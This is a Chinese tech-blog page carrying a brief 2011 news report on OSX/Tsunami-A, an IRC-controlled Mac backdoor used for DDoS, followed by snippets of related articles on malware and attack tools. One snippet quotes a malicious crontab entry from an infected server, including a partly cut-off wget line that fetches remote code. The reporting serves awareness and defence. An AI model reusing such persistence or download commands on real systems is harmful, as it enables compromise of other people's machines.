Mac: 新发现的针对Mac系统的木马-Tsunami-A

最新推荐文章于 2025-07-28 06:45:14 发布
最新推荐文章于 2025-07-28 06:45:14 发布
阅读量216 收藏
点赞数
文章标签: 操作系统
一款新的后门木马程序被发现针对MacOSX系统,此木马源自Linux平台,能通过IRC接收指令发动DDoS攻击或执行其他恶意操作,使用户的Mac设备面临风险。安全公司Sophos为此提供了免费的防护工具。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

OSX/Tsunami-A一个针对Mac OS X系统的后门木马程序,Graham Cluley,SOPHOS公司的资深技术顾问,于2011年11月25日发布在该公司的官方网站。据他说,这个木马后门程序是从一个过去基于Linux的木马移植到Mac OS X系统的,这个木马随时听候IRC发过来的指令,它不仅可以发起DDoS攻击,而且还可以执行控制者发出的各种指令。这样不仅你的Mac系统可以作为发起违法的DDoS攻击的工具,同时也把自己的数据处于危险之中。



该公司有一款针对个人用户免费的杀毒软件,可以免费下载使用。


iteye_365
关注
Linux逆向 - Mirai-
JiangBuLiu的博客
06-04 1258
MiraiMirai变种资料源码Mirai源码[《xd0ol1 - Mirai 源码分析》](https://paper.seebug.org/142/)[《绿盟 - MIRAI源码分析报告》](http://blog.nsfocus.net/mirai-source-analysis-report/)分析报告分析查壳脱壳分析int 80HKiller模块has_exe_access Mirai 虽然Mirai很老了,但是类似学Windows病毒分析拿熊猫烧香练手一样,Linux病毒不逆个Mirai感觉不太
冰河ddos压力测试系统_Linux macOS系统 压力测试工具stress
weixin_39874809的博客
12-06 1628
Linux和macOS系统都支持在线安装。下面拿macOS做个举例➜ brew search stress==> Formulaestress stress-ng➜ brew install stressUpdating Homebrew...==> Downloadinghttps://homebrew.bi...
又一个Mac特洛伊木马被发现!苹果用户要警惕
轻轻草原
07-26 830
Mac电脑安全公司Intego最近发现了一个针对“雪豹”和“狮子”的Mac OS X系统木马,安全研究人员将其命名为“OS/X Crisis”。这个恶意软件是一种植入式的木马病毒,他通过自身的一系列恶意代码把自己伪装成游戏、屏保甚至是音乐文件。这种木马会在没有通知用户的情况下自动安装,并把自己的行踪掩盖起来。其安全研究员Lysa Myers指出:“这种类型的病毒并不常见,它会极力把自己掩藏...
Mac: 再现木马
中国在线教育
10-28 1621
Mac: 再现木马<br />它被发现并被称作,trojan.osx.boonana.a,他可以传染现在主流的Mac OS X系统,该病毒目前通过各种社交网络,以一个叫做"Is this you in this video?"的连接形式传播。<br /> <br />这个连接是一个Java程序,它包含传染Windows和Mac系统的代码,以前有有关在Windows版本的传染报道,不过现在他已经包含了Mac的代码。在Mac上,它会下载Java程序,Java会提示如下提示,而如果你认可,该Java程序可以通过这
Mac木马病毒再现(OSX/Crisis)
系统运维
07-27 572
正当我们翘首期待新版Mac OS X美洲狮10.8的发布,并为它而欢欣鼓舞,忙于下载/安装/测试的时候,在网络安全界却传来了又一个不幸的消息,一个新的Mac病毒被监测到。 这个由Intego公司首先监测到并分析和发布一些具体细节的病毒,同以往的有这很大的不同,比如上次的那个"闻名于世"的闪回(FlashBack),这个病毒并不需要用户的干预,其实,它是默默地在用户无从察觉中感染电...
DDoS木马-Tsunami家族样本分析
人饭子的博客
11-06 640
#sidebar { position: absolute; top: 0; left: 0; bottom: 0; width: 250px; padding: 0; margin: 0; overflow: auto } #page-container { position: absolute; top: 0; left: 0; margin: 0; padding: 0; bord...
活跃挖矿木马盘点
m0_59598029的博客
07-30 729
挖矿木马通过各种手段将挖矿程序植入受害者的计算机中,在用户不知情的情况下,利用受害者计算机的运算能力进行挖矿,从而获取非法收益。目前已知多个威胁组织(例如,“8220”、H2Miner等)传播挖矿木马,致使用户系统资源被恶意占用和消耗、硬件寿命被缩短,严重影响用户生产生活,妨害国民经济和社会发展。2022年,安天CERT发布了多篇针对挖矿木马的分析报告,现将2022年典型的挖矿木马梳理形成家族概览,进行分享。挖矿木马家族出现时间针对平台—|—|—82202017年Outlaw2018年Linux。
威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板” ...
weixin_34353714的博客
03-26 297
简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件。除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患。 由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误...
TSUNAMI 5054-R
weixin_33831196的博客
07-14 132
PROXIM Tsunami 5054-R 5.8G 点对多点产品 Tsunami MP.11 Model 5054-R:   无线点到多点系统   与前一代产品一样,5054-R继续为可适应未来需要的无线网络提供全面的功能集。   o 在坚固的外壳中采用了珀耳帖电加热和冷却技术,5054-R可部署在极端的环境中   o 支持三个5 GHz频段 - 5.2...
两款实用的DDos攻击工具
热门推荐
Man_In_The_Night的博客
04-04 7万+
两款实用的DDos攻击工具 2018-02-22Network•Security865 之前为了重现某个bug,需要对网络设备进行ddos攻击测试,同时也是对设备的网络攻击防护功能进行抗压测试。临阵磨枪,google了两款攻击工具,windows平台的hyenae,以及Linux平台的hping3,在此记录一下两者的用法。 Hyenae hyenae是在Windows平台上非常好用的一...
Linux 下一木马程序分享
系统运维
03-05 333
前几天公司服务器被添加了一木马恶意程序,该程序一运行便对外发起了大量的连接,导致整个内网瘫痪掉,该木马注入的方式非常简单,只是在Linux crond定时器里加入以下任务: [root@localhost tmp]# crontab -l * * * * * /root/.zxc &gt;/dev/null 2&gt;&amp;1 @weekly wget -q http://stab...
Linux进程信号——信号产生
2401_83603768的博客
07-25 970
本文深入探讨了Linux系统中的进程信号机制。信号作为进程间通信与控制的重要手段,可分为普通信号(1-31)和实时信号(34-64)。文章详细介绍了信号的产生方式:1)键盘键入(如Ctrl+C触发SIGINT);2)系统调用(kill/raise/abort函数);3)软件条件(如alarm定时器);4)硬件异常(除零错误、段错误等)。重点分析了信号处理流程,包括信号注册(signal函数)、核心转储机制及其调试应用。通过示例代码展示了如何修改信号默认行为(除SIGKILL/SIGSTOP外)和利用核心转储
Windows与Linux内核架构深度解析:从单核到多核的演进之路
2501_90357013的博客
07-27 818
现代操作系统内核设计呈现不同哲学,Windows NT采用混合内核架构平衡控制与灵活性,而Linux坚持单内核设计强调性能与安全性。
PM2使用
LiuPig
07-24 274
PM2是一个强大的Node.js进程管理工具,特别适合管理npx命令的执行。它提供进程守护、开机自启、日志管理、性能监控等功能,支持多平台。安装PM2后,只需将npx命令作为字符串启动,即可实现进程守护。通过PM2命令可以轻松管理应用状态、查看日志。最关键的是使用pm2 startup和pm2 save设置开机自启,确保服务永不中断。这套方案能同时防止程序崩溃和服务器重启导致的服务中断。
HarmonyOS之ohpm对操作系统平台的要求与软链接机制解析
最新发布
无风听海
07-28 711
OHPM的平台要求并非随意设定,而是其核心依赖管理机制的技术必然结果。理解这些要求背后的原理,有助于开发者更高效地使用OHPM,避免常见的环境配置问题,充分发挥OpenHarmony生态的开发效率优势。软链接(Symbolic Link,又称符号链接)是一种特殊的文件类型,它不包含实际数据,而是包含指向另一个文件或目录的。当系统访问软链接时,会自动重定向到目标位置。OHPM的核心设计理念是。
征服 Linux 网络:核心服务与实战解析
kevin_blog
07-24 1257
摘要 本文深入解析Linux网络管理的核心技能,涵盖六大主题:网络基础配置、DNS/DHCP服务、远程访问、文件共享等。通过实战代码示例,详细讲解如何配置静态IP地址、搭建DHCP服务器、优化SSH安全连接,以及部署NFS/Samba文件共享服务。文章特别强调理解底层协议和精细化控制的重要性,为系统管理员和运维工程师提供完整的Linux网络管理方法论,帮助读者掌握服务器网络配置与故障排查的核心能力。
【Linux内核模块】调试技巧
[byte轻骑兵] 的技术小窝!
07-28 1295
Linux内核模块开发中,调试是确保系统稳定性的关键环节。本文将系统讲解2025年最新调试技术,结合实战案例与工具使用技巧,帮助开发者快速定位内核问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值